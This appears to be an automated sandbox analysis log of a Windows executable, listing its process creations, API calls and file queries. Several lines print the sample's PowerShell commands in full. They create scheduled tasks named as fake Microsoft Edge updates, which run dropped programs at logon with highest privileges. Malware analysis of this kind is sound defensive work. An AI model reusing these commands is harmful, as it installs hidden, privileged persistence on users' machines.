Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $action = new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\../lineinst.exe'; $trigger = new-scheduledtasktrigger -once -at (get-date); $principal = new-scheduledtaskprincipal -userid 'user' -logontype interactive -runlevel highest; register-scheduledtask -action $action -trigger $trigger -principal $principal -taskname 'microsoftedgeupdatesonce' -description 'microsoftedgeupdatesonce once' -force; start-scheduledtask -taskname 'microsoftedgeupdatesonce' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $action = new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\../winhex.exe'; $trigger = new-scheduledtasktrigger -atlogon; $principal = new-scheduledtaskprincipal -userid 'user' -logontype interactive -runlevel highest; register-scheduledtask -action $action -trigger $trigger -principal $principal -taskname 'microsoftedgeupdatesonceme' -description 'microsoftedgeupdatesonce once you' -force; start-scheduledtask -taskname 'microsoftedgeupdatesonceme' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $action = new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\../lineinst.exe'; $trigger = new-scheduledtasktrigger -once -at (get-date); $principal = new-scheduledtaskprincipal -userid 'user' -logontype interactive -runlevel highest; register-scheduledtask -action $action -trigger $trigger -principal $principal -taskname 'microsoftedgeupdatesonce' -description 'microsoftedgeupdatesonce once' -force; start-scheduledtask -taskname 'microsoftedgeupdatesonce' "Jump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $action = new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\../winhex.exe'; $trigger = new-scheduledtasktrigger -atlogon; $principal = new-scheduledtaskprincipal -userid 'user' -logontype interactive -runlevel highest; register-scheduledtask -action $action -trigger $trigger -principal $principal -taskname 'microsoftedgeupdatesonceme' -description 'microsoftedgeupdatesonce once you' -force; start-scheduledtask -taskname 'microsoftedgeupdatesonceme' "Jump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00541F8C InitializeSecurityDescriptor,AllocateAndInitializeSid,AllocateAndInitializeSid,AllocateAndInitializeSid,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,EqualSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,13_2_00541F8C
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_00501150 AllocateAndInitializeSid,CheckTokenMembership,GetLastError,FreeSid,GetLastError,SetLastError,13_2_00501150
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67589B0 cpuid 0_2_00007FF7A67589B0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: GetLocaleInfoW,13_2_00545150
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\LineInst.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\WinHex.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\SystemUpdate.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73322\base_library.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
